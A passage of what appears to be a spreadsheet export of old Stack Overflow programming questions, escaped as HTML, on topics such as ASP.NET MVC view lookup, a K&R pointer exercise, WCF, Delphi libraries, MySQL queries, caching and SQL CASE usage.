&lt;pre&gt;&lt;code&gt;    public override ViewEngineResult FindView(ControllerContext controllerContext, string viewName, string masterName)
    {
        ViewEngineResult areaResult = null;
        if (controllerContext.RouteData.Values.ContainsKey("area"))
        {
            string areaViewName = FormatViewName(controllerContext, viewName);
            areaResult = base.FindView(controllerContext, areaViewName, masterName);
            if (areaResult != null &amp;amp;&amp;amp; areaResult.View != null)
            {
                return areaResult;
            }
            string sharedAreaViewName = FormatSharedViewName(controllerContext, viewName);
            areaResult = base.FindView(controllerContext, sharedAreaViewName, masterName);
            if (areaResult != null &amp;amp;&amp;amp; areaResult.View != null)
            {
                return areaResult;
            }
        }
        return base.FindView(controllerContext, viewName, masterName);
    }
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>K&amp;R exercise: Multidimensional array into pointer array</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Exercise (5-9):
   Rewrite the routines &lt;code&gt;day_of_year&lt;/code&gt; with pointers instead of indexing.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;static char daytab[2][13] = {
    {0, 31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31},
    {0, 31, 29, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31}
};
/* day_of_year: set day of year from month and day */
int day_of_year(int year, int month, int day)
{
    int i, leap;
    leap = (year%4 == 0) &amp;amp;&amp;amp; (year%100 != 0) || (year%400 == 0);
    for (i = 1; i &amp;lt; month; i++)
    {
        day += daytab[leap][i];
    }
    return day;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I may just be tired and not thinking, but how does one actually create a multidimensional array with pointers?&lt;/p&gt;
&lt;p&gt;I could probably figure out the rest of the function, but I can't get the syntax right.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Logic first, WCF security later?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm working on a WCF service that will be communicating over net.tcp to n instances of a client app (that is being developed by another programmer in my office). &lt;/p&gt;
&lt;p&gt;At the moment I am using net.tcp without any security as I felt setting this up at this stage wasn't necessary, at least not until we are closer to rolling out.&lt;/p&gt;
&lt;p&gt;During the development of a WCF application, is there any harm in using a standard binding (net.tcp in my case) without security, then once the business logic has been completed, implement all the security requirements? Are there any things I need to be aware of that may not function after the implementation of security?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there still a place for MDI?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Even though MDI is &lt;a href="http://pixelcentric.net/article-art=docs.html" rel="nofollow"&gt;considered harmful&lt;/a&gt;, several applications (even MS Office, Adobe apps) still use it either in its pure form or some as a hybrid with a tabbed/IDE-like interface.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Is an MDI interface still appropriate for some applications?&lt;/strong&gt; &lt;/p&gt;
&lt;p&gt;I'm thinking of an application where one typically works with several documents at one time, and often wants to have multiple documents side to view or copy/paste between them. &lt;/p&gt;
&lt;p&gt;An example would be &lt;a href="http://www.originlab.com/" rel="nofollow"&gt;Origin&lt;/a&gt;, where one has multiple worksheet and graph windows in a project; a tabbed or IDE-like interface would be much more inconvenient with a lot of switching back and forth.&lt;/p&gt;
&lt;p&gt;On the mac, it's natural and convenient for an application to have multiple top-level windows to solve this, what is the preferred way in Windows if one doesn't use MDI? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the proper way to update Delphi 2009's default installation of Indy 10?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Since Indy is now built-into the install process of Delphi 2009... is there a proper way to 'remove' it so it can be upgraded to the latest from the SVN repo?   There isn't an automated option to remove it as far as I'm aware.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Delphi 2009 and Synapse - tested and ready for Unicode support?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is Synapse ready for a Delphi 2009 production applications?  Their website doesn't look like it's been updated in a while:  &lt;a href="http://www.ararat.cz/synapse/doku.php" rel="nofollow"&gt;http://www.ararat.cz/synapse/doku.php&lt;/a&gt;   Is the project dead?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What's the most efficient way to check the presence of a row in a table?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Say I want to check if a record in a MySQL table exists. I'd run a query, check the number of rows returned. If 0 rows do this, otherwise do that.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SELECT * FROM table WHERE id=5
SELECT id FROM table WHERE id=5
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Is there any difference at all between these two queries? Is effort spent in returning every column, or is effort spent in filtering out the columns we don't care about?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SELECT COUNT(*) FROM table WHERE id=5
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Is a whole new question. Would the server grab all the values and then count the values (harder than usual), or would it not bother grabbing anything and just increment a variable each time it finds a match (easier than usual)?&lt;/p&gt;
&lt;p&gt;I think I'm making a lot of false assumptions about how MySQL works, but that's the meat of the question! Where am I wrong? Educate me, Stack Overflow!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>hiding grids using ESC key</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm new to WPF.
I have like 15 grids on my Window and I have a small menu on which I can click and choose which grid to show up or hide. One grid at a time only. I would like that grid to hode (fade out) when I hit &lt;kbd&gt;Esc&lt;/kbd&gt;. I have all the animations already, I just need to know what grid is visible (active) at the moment.&lt;/p&gt;
&lt;p&gt;I don't know how to get current topmost control of my Window.&lt;/p&gt;
&lt;p&gt;My solution is when &lt;code&gt;KeyDown&lt;/code&gt; event is triggered on my Window to:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;private void Window_KeyDown(object sender, System.Windows.Input.KeyEventArgs e)
    {
        if (e.Key == System.Windows.Input.Key.Escape)
        {
            //check all grids for IsVisible and on the one that is true make 
            BeginStoryboard((Storyboard)this.FindResource("theVisibleOne_Hide"));
        }
    }
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Caching with multiple server</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm building an application with multiple server involved. (4 servers where each one has a database and a webserver. 1 master database and 3 slaves + one load balancer)&lt;/p&gt;
&lt;p&gt;There is several approach to enable caching. Right now it's fairly simple and not efficient at all.
All the caching is done on an NFS partition share between all servers. NFS is the bottleneck in the architecture.&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;I have several ideas implement
caching. It can be done on a server
level (local file system) but the
problem is to invalidate a cache
file when the content has been
update on all server : It can be
done by having a small cache
lifetime (not efficient because the
cache will be refresh sooner that it
should be most of the time)&lt;/li&gt;
&lt;li&gt;It can also be done by a messaging
sytem (XMPP for example) where each
server communicate with each other.
The server responsible for the
invalidation of the cache send a
request to all the other to let them
know that the cache has been
invalidated. Latency is probably
bigger (take more time for everybody
to know that the cache has been
invalidated) but my application
doesn't require atomic cache
invalidation.&lt;/li&gt;
&lt;li&gt;Third approach is to use a cloud
system to store the cache (like
CouchDB) but I have no idea of the
performance for this one. Is it
faster than using a SQL database?&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;I planned to use Zend Framework but I don't think it's really relevant (except that some package probably exists in other Framework to deal with XMPP, CouchDB)&lt;/p&gt;
&lt;p&gt;Requirements: Persistent cache (if a server restart, the cache shouldn't be lost to avoid bringing down the server while re-creating the cache)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Uses for both static strong typed languages like Haskell and dynamic (strong) languages like Common LIsp</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I was working with a Lisp dialect but also learning some Haskell as well.  They share some similarities but the main difference in Common Lisp seems to be that you don't have to define a type for each function, argument, etc.  whereas in Haskell you do.  Also, Haskell is mostly a compiled language.  Run the compiler to generate the executable.&lt;/p&gt;
&lt;p&gt;My question is this, are there different applications or uses where a language like Haskell may make more sense than a more dynamic language like Common Lisp.  For example, it seems that Lisp could be used for more bottom programming, like in building websites or GUIs, where Haskell could be used where compile time checks are more needed like in building TCP/IP servers or code parsers.&lt;/p&gt;
&lt;p&gt;Popular Lisp applications:
Emacs&lt;/p&gt;
&lt;p&gt;Popular Haskell applications:
PUGS
Darcs&lt;/p&gt;
&lt;p&gt;Do you agree, and are there any studies on this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Problem with windows Batch file on windows 7</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a batch file to compile and link all of my code. It contains the following:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;@echo off
nasm -f aout -o start.o start.asm
gcc -Wall -O -fstrength-reduce -fomit-frame-pointer -finline-functions -nostdinc -fno-builtin -I./include -c -o main.o main.c
gcc -Wall -O -fstrength-reduce -fomit-frame-pointer -finline-functions -nostdinc -fno-builtin -I./include -c -o scrn.o scrn.c
ld -T link.ld -o kernel.bin start.o main.o scrn.o
pause
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Problem is, when i run it it just prints all this out as text.
It's definitely a batch file. it has the .bat file ending, and in notepad++, the syntax for @echo off and pause are being highlighted without being set manually.
Is this a windows 7 bug? or am i doing something wrong?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Different Log File For Specific Controller</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I currently have a controller were I would like to keep track of logging in a separate log file, like: tracker.log. I currently get about 100,000 hits a day with this, and I would like to separate the log from all the other controllers so I can easily debug those as well as the tracker.&lt;br /&gt;&lt;br /&gt;
I couldn't find anything for the Rails::Initializer, that would extend specifically for a controller.&lt;br /&gt;&lt;br /&gt;
I know it will be something along the lines of:&lt;/p&gt;
&lt;pre&gt;
config.log_path = 'log/tracker.log'
&lt;/pre&gt;
&lt;p&gt;Although you can't re-run the Rails initializer mid load, right?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Convert existing snippet of code to use Array.ForEach</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We know that if you have:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;var aa = new [] { 1, 2, 3, 4, 5 };
for (int i = 0; i &amp;lt; aa.length; ++i)
{
    aa[i] = aa[i] + 1;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;it's really&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;var aa = new [] { 1, 2, 3, 4, 5 };
Arrary.ForEach(aa, a =&amp;gt; a + 1);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;However, what if I had this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;var aa = new [] { 1, 2, 3, 4, 5 };
var ab = new [] { 1, 2, 3, 4, 5 };
for (int i = 0; i &amp;lt; aa.length; ++i)
{
    aa[i] = ab[i] + 1;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Can I convert this to use just one Array.ForEach? Or, how would you do it, if you wanna go all functional programming crazy? Clunky for loops just looks ugly.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to serialize an Exception object in C#?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to serialize an Exception object in C#. However, it appears that it is impossible since the Exception class is not marked as &lt;a href="https://msdn.microsoft.com/en-us/library/system.serializableattribute"&gt;&lt;code&gt;[Serializable]&lt;/code&gt;&lt;/a&gt;. Is there a way to work around that?&lt;/p&gt;
&lt;p&gt;If something goes wrong during the execution of the application, I want to be informed with the exception that occurred. &lt;/p&gt;
&lt;p&gt;My first reflex is to serialize it.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Python shelve module question</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Does the Python shelve module have any protection built in to make sure two processes aren't writing to a file at the same time?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Display different header depending on page selected</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have an asp.net website with 5 items (home, products, news, about, contact) on the main horizontal navigation.&lt;/p&gt;
&lt;p&gt;The site uses a master page which splits the page into a header, body and footer using &lt;/p&gt;
&lt;p&gt;I want to be able to display a different header (which will include different colors and images) depending on which of the 5 navigation items is selected.&lt;/p&gt;
&lt;p&gt;Can anyone tell me the best way to achieve this without bloating the page download?&lt;/p&gt;
&lt;p&gt;I know my way around asp.net, html, css, javascript and vb but I am no expert.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why does C# designer-generated code (like Form1.designer.cs) play havoc with Subversion?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;My workshop has recently switched to Subversion from SourceSafe, freeing us from automatic locks. This led to concurrent editing of the Forms, which is wonderful. But when multiple developers commit their changes, the code files created by the designer (all the files named &lt;code&gt;TheFormName.designer.cs&lt;/code&gt;) cause conflicts which are very difficult to resolve.&lt;/p&gt;
&lt;p&gt;As far as I can tell, this is because the code generated by the designer is heavily re-arranged whenever the user modifies it, no matter how little the actual change really did.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;How do I make these conflicts easier to resolve? &lt;/li&gt;
&lt;li&gt;Is there some way to tell the designer to modify the code less?&lt;/li&gt;
&lt;li&gt;How do you, the experienced C# teams, deal with concurrent modification of a Form?&lt;/li&gt;
&lt;/ul&gt;
</t>
  </si>
  <si>
    <t>Regarding how best to expose programming to a foreign audience</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm writing a novel at the moment and, while programming will not be receiving a great deal of focus, I do want to at least get it into the reader's head that a character's coding background could cause them to be the way there are about various things.&lt;/p&gt;
&lt;p&gt;So, my question is this: what d'you reckon is the best way to talk about the art in such a manner that the reader gains a bit of comprehension without being scared away? Should I drop "smart-sounding" keywords here and there? Include a bit of actual code? All suggestions are welcome...&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Help with Regex patterns</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need some help with regex.&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;p&gt;I have a pattern AB.* , this pattern should match for strings
like AB.CD AB.CDX (AB.whatever).and
so on..But it should NOT match
strings like  AB,AB.CD.CD ,AB.CD.
AB.CD.CD that is ,if it encounters a
second dot in the string. whats the
regex for this?&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;I have a pattern AB.** , this pattern should match strings like 
AB,AB.CD.CD, AB.CD. AB.CD.CD but NOT
strings like  AB.CD ,AB.CDX,
AB.whatever Whats the regex for
this?&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Thanks a lot.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>LR1 Parser and Epsilon</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to understand how LR1 Parsers work but I came up with a strange problem: What if the grammar contains Epsilons? For instance: if I have the grammar:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;S -&amp;gt; A
A -&amp;gt; a A | B
B -&amp;gt; a
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;It's clear how to start:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;S -&amp;gt; .A
A -&amp;gt; .a A 
A -&amp;gt; .B
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;... and so on&lt;/p&gt;
&lt;p&gt;but I don't know how to do it for such a grammar:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;S -&amp;gt; A
A -&amp;gt; a A a | \epsilon
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Is it correct to do:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;S -&amp;gt; .A
A -&amp;gt; .a A a
( A -&amp;gt; .\epsilon )
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And then make this State in the DFA accepting? &lt;/p&gt;
&lt;p&gt;Any help would really be appreciated!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>reporting services virtual directory</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;i have iis7 i had build the report using business intelligence studio but i cant able to deploy the reports.it has given the error that "you are not attached to the server" but i install the reporting services in my admin account only &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why is my Access database not up-to-date when I read it from another process?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In my application I do the follwing things:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Open a Access database (.mdb) using Jet/ADO and VB6&lt;/li&gt;
&lt;li&gt;Clear and re-fill a table with new data &lt;/li&gt;
&lt;li&gt;Close the database&lt;/li&gt;
&lt;li&gt;Start another process which does something with the new data.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The problem is that &lt;em&gt;sometimes&lt;/em&gt; the second process cannot find the new data. Sometimes the table is just empty, sometimes RecordCount &gt; 0, but EOF is true and I cannot do a MoveFirst or MoveNext. In a nutshell: All kinds of weird things.&lt;/p&gt;
&lt;p&gt;My current workaround is adding a delay between closing the database and starting the second process.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;What is happening here?&lt;/li&gt;
&lt;li&gt;Can I do something about it? (Besides using a different database)&lt;/li&gt;
&lt;/ul&gt;
</t>
  </si>
  <si>
    <t>UML state of the art</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm a fan of UML and use Fowlers &lt;a href="http://rads.stackoverflow.com/amzn/click/0321193687" rel="nofollow" title="UML Distilled"&gt;UML distilled&lt;/a&gt; book as a reference.&lt;/p&gt;
&lt;p&gt;My question is : have things moved on in UML, what is the current 'state of the art'.
Is there a better reference book for modern UML or is the above still a good reference.&lt;/p&gt;
&lt;p&gt;I'd be less interested in 'proposed extensions' and things committees are considering; really I'm looking for what practitioners are actually using, similarly to the content of the Fowler book.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>SVN for Delphi Developers</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have posted a question before, &lt;a href="http://stackoverflow.com/questions/225115/delphi-moving-away-from-vss"&gt;Moving away from VSS&lt;/a&gt;, in which I asked about the best VCS control for Delphi developers who were using VSS.  Most developers seem to use svn with TortoiseSVN.  I tried this for few days and I think it's the best route to go with.&lt;/p&gt;
&lt;p&gt;However, I still have some confusion about the way that svn works so here are a few questions that I'd like answered:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;p&gt;Can I work with old lock way(checkout-modify-checkin) that vss uses?&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Delphi forms have two files (MyForm.pas, MyForm.dfm).  When I add any control to the form, both files will be modified so I want to commit "myform.pas" and have "myform.dfm" commit with it too. Am I missing anything here?&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;The same applies for the Delphi Project file.  Because this links with other files, all of them should be committed when I change the project file.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;What files do you have marked to be ignored in TSVN, so TSVN will not look for these files like (&lt;em&gt;.dcu,&lt;/em&gt;.exe, ...), and can I export it from one Pc to other?&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;I now have to change the way I'm thinking in vss style, and need to change it for SVN style, but with vss, all things were managed within the IDE, which was fantastic ;-).&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;UPDATE:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;5.If I commit the Delphi form(.pas &amp;amp; dfm) and found some one already updated the version before, how do you resolve the conflict if there some new controls and events added to that form and unit(this require Delphi developer with svn).&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What's the right way, for testability, to add functionality to a ComboBox?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;The desired functionality of the 'enhanced' combo box is a quick find method. Each item in the combobox has a ToString() method, such that they can be displayed in the drop down list. On clicking an item in the drop down list, the combobox's observers are notified of the selection.&lt;/p&gt;
&lt;p&gt;Also, every time the typed text in the combobox changes, a list of "Candidates" is generated, made of all those items in the drop down list which contain the text typed in so far. Hitting enter takes you to the first candidate in that list, repeatedly hitting enter cycles you through the list.&lt;/p&gt;
&lt;p&gt;I've implemented this functionality by deriving from ComboBox - I figured this made sense as I'm still functionally left with a combobox, it just has this "QuickFind" feature added. However, the logic to create the candidate list and cycle through it, whilst simple, isn't totally trivial, and would enjoy some testing.&lt;/p&gt;
&lt;p&gt;However, as seen &lt;a href="http://stackoverflow.com/questions/479587/testing-custom-control-derived-from-combobox"&gt;here&lt;/a&gt; it doesn't seem to be all that easy to test a ComboBox just by constructing it and prodding the extra routines I've added - it needs to exist on a form for it to behave the same way as it does in the application.  This seems altogether too much effort to test a simple addition to a simple combo box!&lt;/p&gt;
&lt;p&gt;Nothing in the code to cycle through the candidates is specific to my application however - I have created a general control that may be used in any number of contexts, the only requirement being that the objects in the combobox have a ToString() methiod, which is the same restriction placed on objects going into normal comboboxes anyway, and is guaranteed by C# .NET.&lt;/p&gt;
&lt;p&gt;So, with testability in mind, where would you put the enhanced functionality?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>UIView Clipped By Statusbar until Autorotate</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Ive created a multiview application that uses multiple controllers to display and control views. The problem Im having is, when the simulator initially loads the view the header is partially covered by the bar at top of screen and the tool bar at the base is not touching the base of the screen. I used the Interface builder size attributes to control the view when the iphone rotates and it works perfectly. All smaps into place perfectly both in landscape and portrait mode AFTER a rotation but the problem is with the initial load before a rotation occurs.
Your thoughts a much appreciated.
Tony&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Serving favicon.ico in ASP.NET MVC</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What is the final/best recommendation for how to serve favicon.ico in ASP.NET MVC?&lt;/p&gt;
&lt;p&gt;I am currently doing the following :&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;p&gt;Adding an entry to the &lt;strong&gt;very beginning&lt;/strong&gt; of my RegisterRoutes method :&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;routes.IgnoreRoute("favicon.ico");
&lt;/code&gt;&lt;/pre&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Placing favicon.ico in the root of my application (which is also going to be the root of my domain).&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;I have two questions :&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Is there no way to put favicon.ico somewhere other than the root of my application. Its pretty icky being right there at the same level as &lt;code&gt;Content&lt;/code&gt; and &lt;code&gt;Controllers&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Is this &lt;code&gt;IgnoreRoute("favicon.ico")&lt;/code&gt; statement sufficient - or should I also do the following as discussed in &lt;a href="http://haacked.com/archive/2008/07/14/make-routing-ignore-requests-for-a-file-extension.aspx"&gt;a blog post from Phil Haack&lt;/a&gt;. I'm not aware of ever having seen a request to favicon.ico in any directory other than the root - which would make this unnecessary (but its nice to know how to do it).&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;routes.IgnoreRoute("{*favicon}", new {favicon=@"(.*/)?favicon.ico(/.*)?"});
&lt;/code&gt;&lt;/pre&gt;&lt;/li&gt;
&lt;/ul&gt;
</t>
  </si>
  <si>
    <t>Delphi PDF generation</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We're using Fast Reports to create reports but we're not very happy with the quality of the PDFs it creates. I know we can plug in other PDF components instead of the one that comes with FastReports so my question is&lt;/p&gt;
&lt;p&gt;What good PDF components are there out there (Free or Commercial) for Delphi? Ideally it should not require any dlls.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Edit:&lt;/strong&gt; I bought &lt;a href="http://www.gnostice.com/"&gt;Gnostice&lt;/a&gt; in the end as it had the FastReports integration, source available and a fairly good reputation. I did however find an issue (after I had bought it) with exporting multipage reports from FastReports to PDF where the component leaks memory and corrupts the output. I've reported it to Gnostice so I guess we'll see how good their support is in the next few days...&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Edit 2:&lt;/strong&gt; Gnostice came back with a fix that rectifies the memory leak and the corrupted output.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Shut down a ATL application cleanly</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have developed a console ATL application and want to trap the close?, exit?, terminate? event so that I can close log files and perform a general clean-up on exit.&lt;/p&gt;
&lt;p&gt;How can I trap the 'terminate' event that would result from someone ending the .exe in the task manager?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;EDIT:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;It's a console application, I've attached the main class. Could you possibly point to where and how I should use &lt;code&gt;SetConsoleCtrlHandler&lt;/code&gt;?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;// Override CAtlExeModuleT members
int WinMain(int nShowCmd) throw()
{   
    if (CAtlBaseModule::m_bInitFailed) //ctor failed somewhere
    {
        ATLASSERT(0);
        return -1;
    }
    HRESULT hr = S_OK;
    LPTSTR lpCmdLine = GetCommandLine(); //this line necessary for _ATL_MIN_CRT
    if( ParseCommandLine( lpCmdLine, &amp;amp;hr ) )
    {
        if( SUCCEEDED( RegisterClassObjects( CLSCTX_LOCAL_SERVER, REGCLS_MULTIPLEUSE ) ) )
        {
            CComPtr&amp;lt;IRORCAdapterMain&amp;gt; pAdapter;
            if( SUCCEEDED( pAdapter.CoCreateInstance( L"RORCAdapter.RORCAdapterMain" ) ) )
            {
                if( SUCCEEDED( pAdapter-&amp;gt;StartAdapter() ) )
                {
                    MSG msg;
                    while( GetMessage( &amp;amp;msg, 0, 0, 0 ) )
                        DispatchMessage( &amp;amp;msg );
                }
            }
            RevokeClassObjects();
        }
    }
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Log analyzer for non-web-applications</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have been searching for some kind of tool to analyse log files that are in custom format (my own format for my own program for example). There are many tools that are designed for web-traffic log analysing, but I haven't found suitable tools for custom log files. I'd be happy to find one where I can collect for example all the timestamps and draw conclusions or graphs based on that. For example show TPS (transactions per second).&lt;/p&gt;
&lt;p&gt;I'd preferably use free programs. Basically it can be any kind of data analyser as long as it's capable of parsing log files. I would write a program of my own if I only needed to analyse only one kind of files, but I have need to analyse wide variety of files. &lt;/p&gt;
&lt;p&gt;I did try to google for suitable tool for a long time but every analyser seems to be designed for web traffic.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Validate inputs that are not inside a form with jQuery Validation plugin</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How can I validate some inputs that are not inside a form tag?&lt;/p&gt;
&lt;p&gt;All the samples I found have a form tag, but I want to validate some inputs that are not inside a form.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Best Practice for Using Java System Properties</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Our code uses a lot of system properties eg, 'java.io.tmpdir', 'user.home', 'user.name' etc. We do not have any constants defined for these anywhere (and neither does java I think) or any other clever thing for dealing with them so they are in plain text littered throughout the code.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;String tempFolderPath = System.getProperty("java.io.tmpdir");
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;How is everyone using system properties?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Automated code sanity check tools for Ruby</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What tools do you use for automated code sanity checks and adhering to the coding conventions in your Ruby apps? How do you incorporate them into your process? (I mean tools like roodi, reek, heckle, rcov, dcov, etc.)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Web usability - datalists and operations on rows of data</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Where you have a databound list of items and for each item you may want to provide users the ability to (for example):&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Delete&lt;/li&gt;
&lt;li&gt;Download&lt;/li&gt;
&lt;li&gt;View Detail&lt;/li&gt;
&lt;li&gt;or 'mark' in some way&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;You have a few options:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Provide buttons or links within the row itself to complete the operation on the row item&lt;/li&gt;
&lt;li&gt;Provide a checkbox select within the row and then a means of performing an operation of a group of selected items&lt;/li&gt;
&lt;li&gt;A combination of the above (some operations - 'View Detail' for example - don't work in a grouped selection method)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;What do people think is the most usable approach to providing this kind of interaction? &lt;/p&gt;
&lt;p&gt;Links to examples of 'usable' lists would be good.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>SQL CASE Statement Versus Conditional Statements In Programming Language</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm going through some old stored procedures at work and constantly come across&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;CASE MyColumn WHEN 'Y' THEN 'Yes' WHEN 'N' THEN 'No' ELSE 'Unknown' END
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;It gets even worse when this is tied not to a word, but instead a colour.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;CASE MyColumn WHEN 'Y' THEN 'style="background-color:pink"' ELSE '' END
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The reason this was done was for older ASP 1 pages where everything had to be done inline, but as it's such a large system it's impossible to keep up with updating all the pages.&lt;/p&gt;
&lt;p&gt;Can anyone give any valid evidence that using a SQL query for conditional statements surpasses that in other languages such as C# or Java?  Is this good practice for speed?  Should the plain value be returned and the presentation layer decide what should be done?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>navigation for limiting sql records</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to write a page that will show all the records from a database, and have it limited using the SQL LIMIT syntax. &lt;/p&gt;
